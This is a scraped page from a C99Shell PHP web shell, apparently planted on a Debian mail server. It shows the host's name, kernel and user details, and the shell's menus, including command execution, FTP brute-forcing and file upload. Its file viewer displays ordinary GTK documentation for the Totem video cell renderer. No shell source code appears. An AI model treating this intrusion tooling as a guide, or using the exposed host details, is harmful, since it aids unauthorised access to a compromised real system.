!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.16 (Debian). PHP/5.3.3-7+squeeze19 

uname -a: Linux mail.tri-specialutilitydistrict.com 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC
2014 x86_64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/gtk-doc/html/totem/   drwxr-xr-x
Free 129.81 GB of 142.11 GB (91.34%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     TotemCellRendererVideo.html (11.8 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
TotemCellRendererVideo

TotemCellRendererVideo

TotemCellRendererVideo — a GtkCellRenderer widget for listing videos

Stability Level

Unstable, unless otherwise indicated

Synopsis


#include <totem-cell-renderer-video.h>

                    TotemCellRendererVideo;
                    TotemCellRendererVideoClass;
TotemCellRendererVideo * totem_cell_renderer_video_new  (gboolean use_placeholder);

Object Hierarchy

  GObject
   +----GInitiallyUnowned
         +----GtkObject
               +----GtkCellRenderer
                     +----TotemCellRendererVideo

Properties

  "alignment"                PangoAlignment        : Read / Write
  "thumbnail"                GdkPixbuf*            : Read / Write
  "title"                    gchar*                : Read / Write
  "use-placeholder"          gboolean              : Read / Write

Description

TotemCellRendererVideo is a GtkCellRenderer for rendering video thumbnails, typically in a TotemVideoList. It supports drawing a video thumbnail, and the video's title underneath.

Details

TotemCellRendererVideo

typedef struct _TotemCellRendererVideo TotemCellRendererVideo;

All the fields in the TotemCellRendererVideo structure are private and should never be accessed directly.


TotemCellRendererVideoClass

typedef struct {
	GtkCellRendererClass parent;
} TotemCellRendererVideoClass;

The class structure for the TotemCellRendererVideo type.

GtkCellRendererClass parent;

the parent class

totem_cell_renderer_video_new ()

TotemCellRendererVideo * totem_cell_renderer_video_new  (gboolean use_placeholder);

Creates a new TotemCellRendererVideo with its "use-placeholder" property set to use_placeholder. If use_placeholder is TRUE, the renderer will display a generic placeholder thumbnail if a proper one is not available.

use_placeholder :

if TRUE, use a placeholder thumbnail

Returns :

a new TotemCellRendererVideo

Property Details

The "alignment" property

  "alignment"                PangoAlignment        : Read / Write

A PangoAlignment giving the text alignment for the video title.

Default value: PANGO_ALIGN_CENTER


The "thumbnail" property

  "thumbnail"                GdkPixbuf*            : Read / Write

A GdkPixbuf of a thumbnail of the video to display. When rendered, it will scale to the width of the parent GtkTreeView, so can be as large as reasonable.


The "title" property

  "title"                    gchar*                : Read / Write

The title of the video, as it should be displayed.

Default value: "Unknown video"


The "use-placeholder" property

  "use-placeholder"          gboolean              : Read / Write

If TRUE, a placeholder image should be used for the video thumbnail if a "thumbnail" isn't provided.

Default value: FALSE

See Also

#TotemVideoList

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0136 ]--